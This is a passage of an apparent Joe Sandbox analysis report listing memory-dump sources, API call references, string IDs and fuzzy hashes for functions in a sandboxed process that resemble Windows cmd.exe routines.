                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                      • String ID:
                                                      • API String ID: 2123716050-0
                                                      • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                      • Instruction ID: 2682f37d00c89ed92821bad49e4847d219494f480498ac464faeb65728dc0e86
                                                      • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                      • Instruction Fuzzy Hash: 1D41B132705BC28AEB35DF25D8413F9A794FB49B88F844135DA4D4AA98EF7CE244C351
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                      • String ID:
                                                      • API String ID: 3114114779-0
                                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                      • Instruction ID: 08ba840b93f9f81222026dcd9b03dc040855f0aa22c75cfc6daf96a6a06bd750
                                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                      • Instruction Fuzzy Hash: 52416832A05B429AEB00EF75D4413ACB7A5FB88748F914036EE0E93B94DF78E406C761
                                                      APIs
                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA77A
                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA7AF
                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA80E
                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA839
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA850
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseErrorLastOpen
                                                      • String ID:
                                                      • API String ID: 2240656346-0
                                                      • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                      • Instruction ID: b38a3a9f9cf5a5acf367a5d65db485e9019db06576a00c837405e3cdef694ad6
                                                      • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                      • Instruction Fuzzy Hash: C431B232A18A4292EB10EF14E4416B9F7A4FB8C790F958136EA8E42754DF7CD8418B21
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC01B8: _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                        • Part of subcall function 00007FF7E1DC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DDD0F9
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7E1DDD10F
                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7E1DDD166
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DDD17A
                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7E1DDD18C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 3008996577-0
                                                      • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                      • Instruction ID: eb06e9f46e8c6e8e46e89c25f01fa88308093ece6be68f6665b3c3659ee92fd6
                                                      • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                      • Instruction Fuzzy Hash: FC217C26F14A418AE700EB71E4012BCB7B0FB4DB45B849236EE0D93B98DF38D040CB21
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CreateSemaphore
                                                      • String ID: _p0$wil
                                                      • API String ID: 1078844751-1814513734
                                                      • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                      • Instruction ID: 64eb4fd2208630712e9430ac44b70017d87530f80a757d3062b92cd977c74b72
                                                      • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                      • Instruction Fuzzy Hash: 765117A1B1974286EF21EF5884567B9E2A0EF84B90FD44633DA0E47780DFBDE4058321
                                                      APIs
                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7E1DDB934
                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DC5085), ref: 00007FF7E1DDB9A5
                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DC5085), ref: 00007FF7E1DDB9F7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                      • String ID: %WINDOWS_COPYRIGHT%
                                                      • API String ID: 1103618819-1745581171
                                                      • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                      • Instruction ID: 052f07f01d07f49193ecbcf23ea2154ab8d2ff8bf6f0a1651796ac3534456f60
                                                      • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                      • Instruction Fuzzy Hash: 8C41A262E08B8282EB10EF119452379B7A0FB4AB95FC59332DA9D47395DFBCE481C311
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$_wcslwr
                                                      • String ID: [%s]
                                                      • API String ID: 886762496-302437576
                                                      • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                      • Instruction ID: 988ffe214fd02a0511edfbebf8be999e2121e2606affef89a1b5711694d95ae2
                                                      • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                      • Instruction Fuzzy Hash: D9319E32B05B8685EB25EF21D8917E9A7A0FB88B88F848136DE4D87754DF7CD245C300
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC33A8: iswspace.MSVCRT(?,?,00000000,00007FF7E1DDD6EE,?,?,?,00007FF7E1DD0632), ref: 00007FF7E1DC33C0
                                                      • iswspace.MSVCRT(?,?,?,00007FF7E1DC32A4), ref: 00007FF7E1DC331C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswspace
                                                      • String ID: off
                                                      • API String ID: 2389812497-733764931
                                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                      • Instruction ID: 3cd32d028c9ccdaeffb85a33dfb0399a2746a29ffc38557cae928e3ff8438fc2
                                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                      • Instruction Fuzzy Hash: 8A214C21F0C652A1FB64FB159552379FAA0EF85B90FD88436D90E86784DEBCE440C6A3
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                      • String ID: %s=%s$DPATH$PATH
                                                      • API String ID: 3731854180-3148396303
                                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                      • Instruction ID: eea2dd9ee1255c07c1855c5781151e49d3c93d7cc779e9afd222aee6b181fda1
                                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                      • Instruction Fuzzy Hash: D8219215F0965680EF59FB55E442379A360AF84B80FC89237D90E83395DFBDE440C3A2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcscmp
                                                      • String ID: *.*$????????.???
                                                      • API String ID: 3392835482-3870530610
                                                      • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                      • Instruction ID: 50af0dcd87d2cfe706604e86cf45e5c2e965481ec8cd38e4018b2281685a35e6
                                                      • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                      • Instruction Fuzzy Hash: D7112925B14A6240E764EF12B482639F3A1FB84B80F894432CE4D43B45DFBCE491C351
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                      • API String ID: 383729395-2781220306
                                                      • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                      • Instruction ID: 71aaff33c28f5e7d1e48ee4da68a3d82b400d73214bbf665dee3e08bb859851b
                                                      • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                      • Instruction Fuzzy Hash: 9D119421D0864291EB59EB24D5022B9A271EB447B0FC44337D57E832D4DFBDE441C352
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswspacewcschr
                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                      • API String ID: 287713880-1183017076
                                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                      • Instruction ID: a4ac195c62c4f4a0ec6635d94b10db2ec2f22262b5b7e51bd8adc2725f9af129
                                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                      • Instruction Fuzzy Hash: 39F0F425E08A4691EB24DB05E40223FE5A0FF44F41FC59632D90E82254DF7CD440C662
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                      • API String ID: 1646373207-2530943252
                                                      • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                      • Instruction ID: f6752d62d6d4d400ee06e5239940debec9a6c88f9419e38ffa25d2b8eb171e81
                                                      • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                      • Instruction Fuzzy Hash: 0C010C65E09A0696EB48E711A853339B2A0EF59731BC48777C52E423E0DEBCB5548362
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                      • API String ID: 1646373207-919018592
                                                      • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                      • Instruction ID: b2df41fd6512c423288f666dd3d4606254ef437dd90420f5d5e1f65e4da00132
                                                      • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                      • Instruction Fuzzy Hash: 0BF06725A08A8192EB08AB02F445139FB60EB88BD1B88D132DA0E43B14CFBCD4818710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$CurrentDirectorytowupper
                                                      • String ID:
                                                      • API String ID: 1403193329-0
                                                      • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                      • Instruction ID: a1b5cf2bda2aa43f7727c35679bfb5ae8debeb5020df825faef572e3e9928256
                                                      • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                      • Instruction Fuzzy Hash: C561C232A087828AE710DF65E8417EDB7A4FB84748F904536DE5E43799DF78D450C711
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmp$wcschr
                                                      • String ID:
                                                      • API String ID: 3270668897-0
                                                      • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                      • Instruction ID: 2a6b7bac087105b343c510d7a8adf1b162b9bdec1f2bd9df3dbbdf7007fc777f
                                                      • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                      • Instruction Fuzzy Hash: DA51AF51E0865281EB65FF1594023B9E6A4EF45B80FD88932CA1E472D5DFBCE941C3B2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DriveFullNamePathType
                                                      • String ID:
                                                      • API String ID: 3442494845-0
                                                      • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                      • Instruction ID: ce7f6a86a4d8d29195eff616118a141698825f14d6cca20909f9bb5f0289b02b
                                                      • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
